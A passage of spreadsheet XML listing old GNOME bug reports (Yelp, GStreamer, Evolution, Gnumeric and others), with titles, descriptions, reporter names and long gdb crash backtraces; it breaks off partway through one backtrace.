What is the {nn+} bit about?
Hope this helps.
--
Ross
</t>
  </si>
  <si>
    <t>rossigee</t>
  </si>
  <si>
    <t>YELP-72637</t>
  </si>
  <si>
    <t>Back/Forward buttons take you to the top of a document</t>
  </si>
  <si>
    <t>Calum:
- The Back/Forward buttons only take you back to the top of the relevant
page not the actual anchor point within that page.  For example on a
man page if I click Index then Name then press Back toolbar
button I'm returned to the top of the page not the Index section on
that page.  Pressing Back again takes me to the top of the page again
so it appears to the user as if nothing has happened.  Either
Back/Forward need to remember the anchor point within the page that was
visited or adjacent duplicate page entries should be removed from the
history list. (2)</t>
  </si>
  <si>
    <t>GTKHTML-330452</t>
  </si>
  <si>
    <t>html-editor-control</t>
  </si>
  <si>
    <t>Automatic spell check suggestions should be first level menu option.</t>
  </si>
  <si>
    <t>Have to drill down into a second level menu for suggest word spelling is
cumbersome and inefficient.  it should work like thunderbird where right
clicking shows immediate list of suggested word spellings.  That's one less
click...the way I spell it could be the difference between healthy wrists and
carpel tunnel! :)
Other information:</t>
  </si>
  <si>
    <t>jcanfield</t>
  </si>
  <si>
    <t>GSTREAMER-134663</t>
  </si>
  <si>
    <t>failed assertion at end of movie in totem</t>
  </si>
  <si>
    <t>I was playing matrix.avi and right at the end I got a whole bunch of
(totem:6389): GStreamer-CRITICAL **: file gstdata.c: line 236
(gst_data_unref): assertion `GST_DATA_REFCOUNT_VALUE (data) &gt; 0' failed
(totem:6390): GStreamer-CRITICAL **: file gstdata.c: line 188
(gst_data_ref): assertion `GST_DATA_REFCOUNT_VALUE(data) &gt; 0' failed
followed by a failed assertion:
GStreamer-ERROR **: file gstpad.c: line 2687 (gst_real_pad_dispose):
assertion failed: (GST_PAD_PEER (pad) == NULL)
aborting...
Program received signal SIGTRAP Trace/breakpoint trap.
[Switching to Thread 32771 (LWP 6390)]
0x40dcb965 in g_logv (log_domain=0x40b27be0 GStreamer
    log_level=G_LOG_LEVEL_ERROR
    format=0x40b31a60 file %s: line %d (%s): assertion failed: (%s)
    args1=0x419df498 m\017Â³@\177\n) at gmessages.c:518
518     gmessages.c: No such file or directory.
        in gmessages.c
(gdb) bt
#0  0x40dcb965 in g_logv (log_domain=0x40b27be0 GStreamer
    log_level=G_LOG_LEVEL_ERROR
    format=0x40b31a60 file %s: line %d (%s): assertion failed: (%s)
    args1=0x419df498 m\017Â³@\177\n) at gmessages.c:518
#1  0x40dcb9e9 in g_log (log_domain=0x40b27be0 GStreamer
    log_level=G_LOG_LEVEL_ERROR
    format=0x40b31a60 file %s: line %d (%s): assertion failed: (%s))
    at gmessages.c:541
#2  0x40afc897 in gst_real_pad_dispose (object=0x838592c) at gstpad.c:2687
#3  0x40be9e3c in g_object_last_unref (object=0x838592c) at gobject.c:557
#4  0x40bed2b6 in g_object_unref (_object=0x838592c) at gobject.c:1590
#5  0x40ad3f26 in gst_object_unref (object=0x838592c) at gstobject.c:242
#6  0x40aece4c in _gst_event_free (event=0x8096468) at gstevent.c:91
#7  0x40aded87 in gst_data_unref (data=0x8096468) at gstdata.c:243
#8  0x40afeb93 in gst_pad_event_default_dispatch (pad=0x838561c
    element=0x83cd310 event=0x8096468) at gstpad.c:3479
#9  0x40afed42 in gst_pad_event_default (pad=0x838561c event=0x8096468)
    at gstpad.c:3505
#10 0x40aff2d5 in gst_pad_send_event (pad=0x838561c event=0x8096468)
    at gstpad.c:3604
#11 0x41356ab5 in gst_opt_scheduler_chain_wrapper (sinkpad=0x838561c
    data=0x8096468) at gstoptimalscheduler.c:1155
#12 0x40afd6e5 in gst_pad_push (pad=0x8385558 data=0x8096468) at gstpad.c:2902
#13 0x412ded2a in gst_switch_loop (element=0x83cd1a0) at gstswitch.c:209
#14 0x41356411 in loop_group_schedule_function (argc=0 argv=0x83f4e08)
    at gstoptimalscheduler.c:997
#15 0x41355d5c in schedule_group (group=0x83f4e08) at gstoptimalscheduler.c:842
#16 0x41355eac in gst_opt_scheduler_schedule_run_queue (osched=0x83cc870)
    at gstoptimalscheduler.c:881
#17 0x41356070 in schedule_chain (chain=0x83f4de8) at gstoptimalscheduler.c:925
#18 0x41358bdc in gst_opt_scheduler_iterate (sched=0x83cc870)
    at gstoptimalscheduler.c:2068
#19 0x40b08940 in gst_scheduler_iterate (sched=0x83cc870) at gstscheduler.c:705
#20 0x40ad939d in gst_bin_iterate_func (bin=0x837d1c4) at gstbin.c:1081
#21 0x40ad296e in gst_marshal_BOOLEAN__VOID (closure=0x8091268
    return_value=0x419dfacc n_param_values=1 param_values=0x419dfc9c
    invocation_hint=0x419dfb04 marshal_data=0x40ad9351) at gstmarshal.c:394
#22 0x40be6fbe in g_type_class_meta_marshal (closure=0x8091268
    return_value=0x419dfacc n_param_values=1 param_values=0x419dfc9c
    invocation_hint=0x419dfb04 marshal_data=0x11c) at gclosure.c:514
#23 0x40be6d04 in g_closure_invoke (closure=0x8091268
    return_value=0x419dfacc n_param_values=1 param_values=0x419dfc9c
    invocation_hint=0x419dfb04) at gclosure.c:437
#24 0x40bfe35f in signal_emit_unlocked_R (node=0x80912a0 detail=0
    instance=0x837d1c4 emission_return=0x419dfc1c
    instance_and_params=0x419dfc9c) at gsignal.c:2474
---Type  to continue or q  to quit---
#25 0x40bfd2eb in g_signal_emit_valist (instance=0x837d1c4 signal_id=23
    detail=0 var_args=0x419dfe28 &lt;Ã¾\235A8\037\t\b\001) at gsignal.c:2205
#26 0x40bfd5bb in g_signal_emit (instance=0x837d1c4 signal_id=23 detail=0)
    at gsignal.c:2239
#27 0x40ad9586 in gst_bin_iterate (bin=0x837d1c4) at gstbin.c:1120
#28 0x40b12a8a in gst_thread_main_loop (arg=0x837d1c4) at gstthread.c:552
#29 0x40dde13a in g_thread_create_proxy (data=0x843ca18) at gthread.c:601
#30 0x40d41f60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#31 0x40d420fe in pthread_start_thread_event () from /lib/i686/libpthread.so.0
#32 0x410fd327 in clone () from /lib/i686/libc.so.6</t>
  </si>
  <si>
    <t>GTHUMB-99629</t>
  </si>
  <si>
    <t>exits typo in gthumb message</t>
  </si>
  <si>
    <t>#: src/dlg-file-utils.c:91
msgid The destination folder does not exits. Do you want to create it ?
Should probably be exist.</t>
  </si>
  <si>
    <t>EVOLUTION-492120</t>
  </si>
  <si>
    <t>Crash when opening preferences window :: Due to RSS plugin</t>
  </si>
  <si>
    <t>I have seen this crash multiple times finally managed to grab a stacktrace and file this. Its weird that I've disabled Evolution RSS plugin in the plugin manager.
(gdb) thread apply all bt
Thread 53 (Thread 0xac925b90 (LWP 5310)):
#0  0xb7f89410 in ?? ()
#1  0xac9254b8 in ?? ()
#2  0x00000002 in ?? ()
#3  0x00000000 in ?? ()
Thread 52 (Thread 0xad126b90 (LWP 5309)):
#0  0xb7f89410 in ?? ()
#1  0xad126308 in ?? ()
#2  0x00000001 in ?? ()
#3  0x00000000 in ?? ()
Thread 51 (Thread 0xad927b90 (LWP 5308)):
#0  0xb7f89410 in ?? ()
#1  0xad927398 in ?? ()
#2  0x00000002 in ?? ()
#3  0x00000000 in ?? ()
Thread 50 (Thread 0xae128b90 (LWP 5307)):
#0  0xb7f89410 in ?? ()
#1  0xae128398 in ?? ()
#2  0x00000002 in ?? ()
#3  0x00000000 in ?? ()
Thread 49 (Thread 0xafa2bb90 (LWP 5306)):
#0  0xb7f89410 in ?? ()
#1  0xafa2b398 in ?? ()
#2  0x00000002 in ?? ()
#3  0x00000000 in ?? ()
Thread 13 (Thread 0xafad9b90 (LWP 5196)):
#0  0xb7f89410 in ?? ()
#1  0xafad92f8 in ?? ()
#2  0xffffffff in ?? ()
#3  0x00000008 in ?? ()
#4  0xb69b2ea3 in poll () from /lib/libc.so.6
#5  0xb6a5b013 in g_main_context_iterate (context=0x83470d8 block=1 dispatch=1 self=0x80950c8) at gmain.c:2996
#6  0xb6a5b389 in IA__g_main_loop_run (loop=0x8650b80) at gmain.c:2898
#7  0xb73e8e80 in link_io_thread_fn (data=0x0) at linc.c:396
#8  0xb6a7b14f in g_thread_create_proxy (data=0x80950c8) at gthread.c:635
#9  0xb6c7f112 in start_thread () from /lib/libpthread.so.0
#10 0xb69bc2ee in clone () from /lib/libc.so.6
Thread 12 (Thread 0xb02dab90 (LWP 5195)):
#0  0xb7f89410 in ?? ()
#1  0xb02da2e8 in ?? ()
#2  0xffffffff in ?? ()
#3  0x00000001 in ?? ()
#4  0xb69b2ea3 in poll () from /lib/libc.so.6
#5  0xb6a5b013 in g_main_context_iterate (context=0x8723f60 block=1 dispatch=1 self=0x8723c30) at gmain.c:2996
#6  0xb6a5b389 in IA__g_main_loop_run (loop=0x8720e90) at gmain.c:2898
#7  0xb7d97f22 in startup_mainloop (arg=0x0) at e-book.c:3767
#8  0xb6a7b14f in g_thread_create_proxy (data=0x8723c30) at gthread.c:635
#9  0xb6c7f112 in start_thread () from /lib/libpthread.so.0
---Type  to continue or q  to quit---
#10 0xb69bc2ee in clone () from /lib/libc.so.6
Thread 11 (Thread 0xb0ec0b90 (LWP 5194)):
#0  0xb7f89410 in ?? ()
#1  0xb0ec0368 in ?? ()
#2  0x00000007 in ?? ()
#3  0x00000000 in ?? ()
Thread 10 (Thread 0xb2eceb90 (LWP 5192)):
#0  0xb7f89410 in ?? ()
#1  0xb2ece368 in ?? ()
#2  0x00000013 in ?? ()
#3  0x00000000 in ?? ()
Thread 9 (Thread 0xb16cbb90 (LWP 5191)):
#0  0xb7f89410 in ?? ()
#1  0xb16cb368 in ?? ()
#2  0x00000046 in ?? ()
#3  0x00000000 in ?? ()
Thread 6 (Thread 0xb1eccb90 (LWP 5188)):
#0  0xb7f89410 in ?? ()
#1  0xb1ecc368 in ?? ()
#2  0x00000046 in ?? ()
#3  0x00000000 in ?? ()
Thread 5 (Thread 0xb26cdb90 (LWP 5187)):
#0  0xb7f89410 in ?? ()
#1  0xb26cd368 in ?? ()
#2  0x00000046 in ?? ()
#3  0x00000000 in ?? ()
Thread 3 (Thread 0xb36cfb90 (LWP 5185)):
#0  0xb7f89410 in ?? ()
#1  0xb36cf368 in ?? ()
#2  0x00000046 in ?? ()
#3  0x00000000 in ?? ()
Thread 2 (Thread 0xb3ed0b90 (LWP 5184)):
#0  0xb7f89410 in ?? ()
#1  0xb3ecfc68 in ?? ()
#2  0x00000001 in ?? ()
#3  0x00000000 in ?? ()
Thread 1 (Thread 0xb68c66c0 (LWP 5154)):
#0  0xaf20b1c9 in rss_config_control_new () at rss.c:4255
#1  0xaf20c11e in factory (factory=0x871e6c0 component_id= closure=0x0) at rss.c:4437
#2  0xb7494f80 in bonobo_marshal_OBJECT__STRING (closure=0x8874168 return_value=0xbff6b454 n_param_values=2 param_values=0x8c61a60
    invocation_hint=0x0 marshal_data=0xaf20c0d0) at bonobo-marshal.c:203
#3  0xb6af8ffb in IA__g_closure_invoke (closure=0x8874168 return_value=0xbff6b454 n_param_values=2 param_values=0x8c61a60 invocation_hint=0x0)
    at gclosure.c:490
#4  0xb7493af4 in bonobo_closure_invoke_va_list (closure=0x8874168 return_value=0xbff6b454 var_args=0xbff6b49c ) at bonobo-types.c:404
#5  0xb7493d5c in bonobo_closure_invoke (closure=0x8874168 return_type=134802000) at bonobo-types.c:467
#6  0xb747f3d0 in bonobo_generic_factory_new_generic (factory=0x871e6c0 act_iid=0x88023f1 OAFIID:GNOME_Evolution_RSS:2.12)
    at bonobo-generic-factory.c:276
---Type  to continue or q  to quit---
#7  0xb748d574 in bonobo_shlib_factory_new_generic (factory=0x871e6c0 act_iid=0x88023f1 OAFIID:GNOME_Evolution_RSS:2.12) at bonobo-shlib-factory.c:155
#8  0xb747f6a9 in impl_Bonobo_ObjectFactory_createObject (servant=0x871e6d4 obj_act_iid=0x88023f1 OAFIID:GNOME_Evolution_RSS:2.12 ev=0xbff6b7d4)
    at bonobo-generic-factory.c:81
#9  0xb7455461 in _ORBIT_skel_small_Bonobo_GenericFactory_createObject (_o_servant=0x871e6d4 _o_retval=0xbff6b5b0 _o_args=0xbff6b5ac _o_ctx=0x0
    _o_ev=0xbff6b7d4 _impl_createObject=0xb747f620 ) at Bonobo_GenericFactory-common.c:16
#10 0xb73dd510 in ORBit_c_stub_invoke (obj=0x8c61a00 methods=0xb74614a4 method_index=0 ret=0xbff6b5b0 args=0xbff6b5ac ctx=0x0 ev=0xbff6b7d4
    class_id=11 method_offset=4 skel_impl=0xb7455440 ) at poa.c:2630
#11 0xb7457023 in Bonobo_GenericFactory_createObject (_obj=0x8c61a00 iid=0x88023f1 OAFIID:GNOME_Evolution_RSS:2.12 ev=0xbff6b7d4)
    at Bonobo_GenericFactory-stubs.c:13
#12 0xb74590c3 in bonobo_activation_activate_shlib_server (sh=0x87b507c ev=0xbff6b7d4) at bonobo-activation-shlib.c:203
#13 0xb74599de in handle_activation_result (result=0x87b507c ret_aid=0x0 ev=0x877687f) at bonobo-activation-activate.c:315
#14 0xb745a12a in bonobo_activation_activate (requirements=0xbff6b6e0 iid == 'OAFIID:GNOME_Evolution_RSS:2.12' selection_order=0x0 flags=0
    ret_aid=0x0 opt_ev=0xbff6b7d4) at bonobo-activation-activate.c:395
#15 0xb745a328 in bonobo_activation_activate_from_id (aid=0x80f2cd1 OAFIID:GNOME_Evolution_RSS:2.12 flags=0 ret_aid=0x0 opt_ev=0xbff6b7d4)
    at bonobo-activation-activate.c:437
#16 0x0805755a in e_shell_settings_dialog_init (dialog=0x8566320) at e-shell-settings-dialog.c:216
#17 0xb6b1a77a in IA__g_type_create_instance (type=142984496) at gtype.c:1569
#18 0xb6b00872 in g_object_constructor (type=142984496 n_construct_properties=2 construct_params=0x8b76e80) at gobject.c:1046
#19 0xb6afe9cb in IA__g_object_newv (object_type=142984496 n_parameters=0 parameters=0x0) at gobject.c:937
#20 0xb6aff59f in IA__g_object_new_valist (object_type=142984496 first_property_name=0x0 var_args=0xbff6bb48 (\202h\b\221&gt;\001) at gobject.c:986
#21 0xb6aff750 in IA__g_object_new (object_type=142984496 first_property_name=0x0) at gobject.c:795
#22 0x0805718c in e_shell_settings_dialog_new () at e-shell-settings-dialog.c:323
#23 0x08052567 in e_shell_show_settings (shell=0x8114630 type=0x838a078 mail shell_window=0x82090b8) at e-shell.c:1258
#24 0x080592d1 in e_shell_window_show_settings (window=0x82090b8) at e-shell-window.c:1261
#25 0xb78b4a23 in marshal_VOID__USER_DATA_STRING (closure=0x834bdb8 return_value=0xbff6bda4 n_param_values=2 param_values=0x8688230
    invocation_hint=0x0 marshal_data=0x8057c50) at bonobo-ui-component.c:221
#26 0xb6af8ffb in IA__g_closure_invoke (closure=0x834bdb8 return_value=0xbff6bda4 n_param_values=2 param_values=0x8688230 invocation_hint=0x0)
    at gclosure.c:490
#27 0xb7493af4 in bonobo_closure_invoke_va_list (closure=0x834bdb8 return_value=0xbff6bda4 var_args=0xbff6bde8 ) at bonobo-types.c:404
#28 0xb7493d0e in bonobo_closure_invoke (closure=0x834bdb8 return_type=4) at bonobo-types.c:467
#29 0xb78b4c0a in impl_Bonobo_UIComponent_execVerb (servant=0x8114394 cname=0x894d710 Settings ev=0xbff6bef8) at bonobo-ui-component.c:158
#30 0xb7495e61 in _ORBIT_skel_small_Bonobo_UIComponent_execVerb (_o_servant=0x8114394 _o_retval=0x0 _o_args=0xbff6beb0 _o_ctx=0x0 _o_ev=0xbff6bef8
    _impl_execVerb=0xb78b4b70 ) at Bonobo-common.c:332
#31 0xb73dd510 in ORBit_c_stub_invoke (obj=0x834bb18 methods=0xb74b7384 method_index=4 ret=0x0 args=0xbff6beb0 ctx=0x0 ev=0xbff6bef8 class_id=14
    method_offset=20 skel_impl=0xb7495e40 ) at poa.c:2630
#32 0xb749d744 in Bonobo_UIComponent_execVerb (_obj=0x834bb18 cname=0x894d710 Settings ev=0xbff6bef8) at Bonobo-stubs.c:544
#33 0xb78bb59d in impl_emit_verb_on (engine=0x835ae10 node=0x8344d80) at bonobo-ui-engine.c:1533
#34 0xb6b06ac3 in IA__g_cclosure_marshal_VOID__POINTER (closure=0x833ed90 return_value=0x0 n_param_values=2 param_values=0xbff6c1cc
    invocation_hint=0xbff6c0ac marshal_data=0xb78bb3c0) at gmarshal.c:601
#35 0xb6af7819 in g_type_class_meta_marshal (closure=0x833ed90 return_value=0x0 n_param_values=2 param_values=0xbff6c1cc invocation_hint=0xbff6c0ac
    marshal_data=0x4c) at gclosure.c:567
#36 0xb6af8ffb in IA__g_closure_invoke (closure=0x833ed90 return_value=0x0 n_param_values=2 param_values=0xbff6c1cc invocation_hint=0xbff6c0ac)
    at gclosure.c:490
#37 0xb6b0b5a3 in signal_emit_unlocked_R (node=0x8352528 detail=0 instance=0x835ae10 emission_return=0x0 instance_and_params=0xbff6c1cc)
    at gsignal.c:2478
#38 0xb6b0c3d3 in IA__g_signal_emit_valist (instance=0x877687f signal_id=184 detail=0 var_args=0xbff6c410 \\024) at gsignal.c:2199
#39 0xb6b0c679 in IA__g_signal_emit (instance=0x835ae10 signal_id=184 detail=0) at gsignal.c:2243
#40 0xb78b71a8 in bonobo_ui_engine_emit_verb_on_w (engine=0x835ae10 widget=0x834fdd0) at bonobo-ui-engine.c:3040
#41 0xb78c0725 in exec_verb_cb (item=0x834fdd0 engine=0x835ae10) at bonobo-ui-sync-menu.c:473
#42 0xb6b06a09 in IA__g_cclosure_marshal_VOID__VOID (closure=0x83437b0 return_value=0x0 n_param_values=1 param_values=0xbff6c6bc
    invocation_hint=0xbff6c59c marshal_data=0xb78c06f0) at gmarshal.c:77
#43 0xb6af8ffb in IA__g_closure_invoke (closure=0x83437b0 return_value=0x0 n_param_values=1 param_values=0xbff6c6bc invocation_hint=0xbff6c59c)
    at gclosure.c:490
#44 0xb6b0af5b in signal_emit_unlocked_R (node=0x809fb28 detail=0 instance=0x834fdd0 emission_return=0x0 instance_and_params=0xbff6c6bc)
    at gsignal.c:2440
---Type  to continue or q  to quit---
#45 0xb6b0c3d3 in IA__g_signal_emit_valist (instance=0x877687f signal_id=104 detail=0 var_args=0xbff6c8fc ï¿½r*ï¿½9) at gsignal.c:2199
#46 0xb6b0c679 in IA__g_signal_emit (instance=0x834fdd0 signal_id=104 detail=0) at gsignal.c:2243
#47 0xb72a0e38 in IA__gtk_widget_activate (widget=0x834fdd0) at gtkwidget.c:4706
#48 0xb718b8fa in IA__gtk_menu_shell_activate_item (menu_shell=0x8339228 menu_item=0x834fdd0 force_deactivate=1) at gtkmenushell.c:1145
#49 0xb718d498 in gtk_menu_shell_button_release (widget=0x8339228 event=0x8c5b250) at gtkmenushell.c:669
#50 0xb71846f8 in gtk_menu_button_release (widget=0x8339228 event=0x8c5b250) at gtkmenu.c:2725
#51 0xb717e75e in _gtk_marshal_BOOLEAN__BOXED (closure=0x809ec60 return_value=0xbff6cb50 n_param_values=2 param_values=0xbff6cc5c
    invocation_hint=0xbff6cb3c marshal_data=0xb7184620) at gtkmarshalers.c:84
#52 0xb6af7819 in g_type_class_meta_marshal (closure=0x809ec60 return_value=0xbff6cb50 n_param_values=2 param_values=0xbff6cc5c
    invocation_hint=0xbff6cb3c marshal_data=0xb4) at gclosure.c:567
#53 0xb6af8ffb in IA__g_closure_invoke (closure=0x809ec60 return_value=0xbff6cb50 n_param_values=2 param_values=0xbff6cc5c invocation_hint=0xbff6cb3c)
    at gclosure.c:490
#54 0xb6b0b5a3 in signal_emit_unlocked_R (node=0x809f0d0 detail=0 instance=0x8339228 emission_return=0xbff6ce1c instance_and_params=0xbff6cc5c)
    at gsignal.c:2478
#55 0xb6b0c286 in IA__g_signal_emit_valist (instance=0x8339228 signal_id=45 detail=0 var_args=0xbff6cea0 ï¿½Pï¿½b(\2223\bï¿½017*(\2223\bï¿½\t\b)
    at gsignal.c:2209
#56 0xb6b0c679 in IA__g_signal_emit (instance=0x8339228 signal_id=45 detail=0) at gsignal.c:2243
#57 0xb729c2e8 in gtk_widget_event_internal (widget=0x8339228 event=0x8c5b250) at gtkwidget.c:4675
#58 0xb71778df in IA__gtk_propagate_event (widget=0x8339228 event=0x8c5b250) at gtkmain.c:2319
#59 0xb7178af7 in IA__gtk_main_do_event (event=0x8c5b250) at gtkmain.c:1539
#60 0xb6ee21fa in gdk_event_dispatch (source=0x808cce0 callback=0 user_data=0x0) at gdkevents-x11.c:2351
#61 0xb6a57bac in IA__g_main_context_dispatch (context=0x808cd28) at gmain.c:2061
#62 0xb6a5afdf in g_main_context_iterate (context=0x808cd28 block=1 dispatch=1 self=0x8066310) at gmain.c:2694
#63 0xb6a5b389 in IA__g_main_loop_run (loop=0x8565f30) at gmain.c:2898
#64 0xb7481863 in bonobo_main () at bonobo-main.c:311
#65 0x0805d67e in main (argc=1 argv=0xbff6d2c4) at main.c:602</t>
  </si>
  <si>
    <t>cooly</t>
  </si>
  <si>
    <t>srinidhi.bs</t>
  </si>
  <si>
    <t>GNUMERIC-37774</t>
  </si>
  <si>
    <t>Creating a sheet object by click no-drag release crashes</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.61
Synopsis: Div by 0
Class:    sw-bug
Distribution: Debian testing/unstable
System: Linux 2.4.0 i686 unknown
C library: C library 2.2-11
C compiler: 2.95.3
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print 
gnome-core: gnome-core 1.2.4-helix2
Description:
There is a div by 0 when creating a arrow of null length.
Debugging information:
(no debugging symbols found)...#0  0x4073aba9 in ?? ()
#1  0x401ffc48 in ?? ()
#2  
#3  0x80a89a1 in sheet_col_get_info ()
#4  0x80af938 in sheet_object_range_set ()
#5  0x80afa10 in sheet_object_position_pixels ()
#6  0x80b86fa in scg_object_view_position ()
#7  0x8090251 in item_grid_draw_border ()
#8  0x404739cb in ?? ()
#9  0x404a268c in ?? ()
#10 0x404a1af5 in ?? ()
#11 0x4049fbd3 in ?? ()
#12 0x404d5feb in ?? ()
#13 0x40473935 in ?? ()
#14 0x40472b5e in ?? ()
#15 0x40520027 in ?? ()
#16 0x405512b9 in ?? ()
#17 0x405518c3 in ?? ()
#18 0x40551a5c in ?? ()
#19 0x40472457 in ?? ()
#20 0x8066111 in _start ()
#21 0x8066166 in main ()
#22 0x406b5dcc in ?? ()
#0  0x4073aba9 in ?? ()
No symbol table info available.
#1  0x401ffc48 in ?? ()
No symbol table info available.
#2  
No symbol table info available.
#3  0x80a89a1 in sheet_col_get_info ()
No symbol table info available.
#4  0x80af938 in sheet_object_range_set ()
No symbol table info available.
#5  0x80afa10 in sheet_object_position_pixels ()
No symbol table info available.
#6  0x80b86fa in scg_object_view_position ()
No symbol table info available.
#7  0x8090251 in item_grid_draw_border ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 12:33 -------
This bug was previously known as bug 37774 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=37774
Originally filed under the Gnumeric product and general component.
The original reporter (speed@blue.tc) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>speed</t>
  </si>
  <si>
    <t>GNOME-PRINT-56749</t>
  </si>
  <si>
    <t>Print to file does not warn of overwrite</t>
  </si>
  <si>
    <t>If you print a sheet to an existing file you are not warned if this file
exists rather gnumeric simply overwrites the file.
This is different than text export where a warning does appear.
--adrian</t>
  </si>
  <si>
    <t>lauris</t>
  </si>
  <si>
    <t>acuster</t>
  </si>
  <si>
    <t>EVOLUTION-524323</t>
  </si>
  <si>
    <t>crash in Evolution Mail: Attaching a .doc documen...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Attaching a .doc document to the email using the paperclip icon in the mail window. The app crashed at the point when I double clicked on the file I wanted attached
Distribution: Debian lenny/sid
Gnome Release: 2.22.0 2008-03-14 (Debian)
BugBuddy Version: 2.20.1
System: Linux 2.6.22-3-k7 #1 SMP Sun Feb 10 21:04:14 UTC 2008 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10400090
Selinux: No
Accessibility: Disabled
GTK+ Theme: Lush
Icon Theme: Lush
Memory status: size: 150564864 vsize: 150564864 resident: 30400512 share: 18763776 rss: 30400512 rss_rlim: 4294967295
CPU usage: start_time: 1206459462 rtime: 380 utime: 365 stime: 15 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/evolution'
(no debugging symbols found)
Using host libthread_db library /lib/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 0xb6784a80 (LWP 18425)]
[New Thread 0xb1200b90 (LWP 18455)]
[New Thread 0xb4d45b90 (LWP 18453)]
[New Thread 0xb2d21b90 (LWP 18446)]
[New Thread 0xb2520b90 (LWP 18443)]
[New Thread 0xb1d1fb90 (LWP 18441)]
[New Thread 0xb4544b90 (LWP 18440)]
[New Thread 0xb3522b90 (LWP 18436)]
[New Thread 0xb3d23b90 (LWP 18435)]
[New Thread 0xb5546b90 (LWP 18430)]
[New Thread 0xb5d47b90 (LWP 18429)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7c02fdb in waitpid () from /lib/i686/cmov/libpthread.so.0
#2  0xb6ed56b4 in g_spawn_sync () from /usr/lib/libglib-2.0.so.0
#3  0xb6ed59cc in g_spawn_command_line_sync () from /usr/lib/libglib-2.0.so.0
#4  0xb7e74268 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
#5  0x0805e429 in ?? ()
#6  0x0000000b in ?? ()
#7  0x00000000 in ?? ()
Thread 11 (Thread 0xb5d47b90 (LWP 18429)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7bff015 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6e7adc2 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x083a1c08 in ?? ()
No symbol table info available.
#4  0x0821c3b0 in ?? ()
No symbol table info available.
#5  0xb5d472c8 in ?? ()
No symbol table info available.
#6  0xb6e7b0cf in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb7b42cb5 in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#8  0xb7b4339c in ?? () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#9  0x08151ac8 in ?? ()
No symbol table info available.
#10 0x080f20e8 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
Thread 10 (Thread 0xb5546b90 (LWP 18430)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7bff015 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6e7adc2 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x083a1c08 in ?? ()
No symbol table info available.
#4  0x0821c3b0 in ?? ()
No symbol table info available.
#5  0xb55462c8 in ?? ()
No symbol table info available.
#6  0xb6e7b0cf in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb7b42cb5 in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#8  0xb7b4339c in ?? () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#9  0x08151ac8 in ?? ()
No symbol table info available.
#10 0x0832f250 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
Thread 9 (Thread 0xb3d23b90 (LWP 18435)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7bff015 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6e7adc2 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x083a1c08 in ?? ()
No symbol table info available.
#4  0x0821c3b0 in ?? ()
No symbol table info available.
#5  0xb3d232c8 in ?? ()
No symbol table info available.
#6  0xb6e7b0cf in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb7b42cb5 in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#8  0xb7b4339c in ?? () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#9  0x08151ac8 in ?? ()
No symbol table info available.
#10 0x08358ea0 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
Thread 8 (Thread 0xb3522b90 (LWP 18436)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7bff015 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb6e7adc2 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x083a1c08 in ?? ()
No symbol table info available.
#4  0x0821c3b0 in ?? ()
No symbol table info available.
#5  0xb35222c8 in ?? ()
No symbol table info available.
#6  0xb6e7b0cf in g_async_queue_pop_unlocked () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb7b42cb5 in e_msgport_wait () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#8  0xb7b4339c in ?? () from /usr/lib/libedataserver-1.2.so.9
No symbol table info available.
#9  0x08151ac8 in ?? ()
No symbol table info available.
#10 0x0835cd98 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
Thread 7 (Thread 0xb4544b90 (LWP 18440)):
#0  0xffffe410 in __kernel_vsyscall ()
